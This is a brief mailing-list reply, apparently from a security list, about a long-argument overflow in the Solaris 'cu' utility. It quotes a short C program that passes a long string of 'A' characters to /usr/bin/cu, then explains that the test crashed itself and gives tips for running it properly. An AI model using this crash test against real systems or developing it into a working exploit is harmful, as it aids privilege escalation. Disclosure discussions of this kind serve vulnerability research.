Dan Harkless <[EMAIL PROTECTED]> wrote:

>Are you implying the above patches fix the cu long hardlink name
>vulnerability?  This is not the case, at least on 2.6:
>
>    # cat > cu_exploit.c
>    #include <stdio.h>
>
>    void main(int argc,char **argv)
>    {
>    char *buf;
>
>    buf = (char *) malloc(atoi(argv[1])*sizeof(char));
>    memset(buf,0x41,atoi(argv[1])-1);
>    buf[atoi(argv[1])-1]=0;
>    execl("/usr/bin/cu",buf,(char *)0);
>    }
>    # gcc cu_exploit.c
>    cu_exploit.c: In function `main':
>    cu_exploit.c:4: warning: return type of `main' is not `int'
>    # a.out
>    Segmentation fault

see that atoi(argv[1])?  a.out crashed not /usr/bin/cu.  try a.out 4000 or
whatever number next time, or trace through it with gdb.

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog

Reply via email to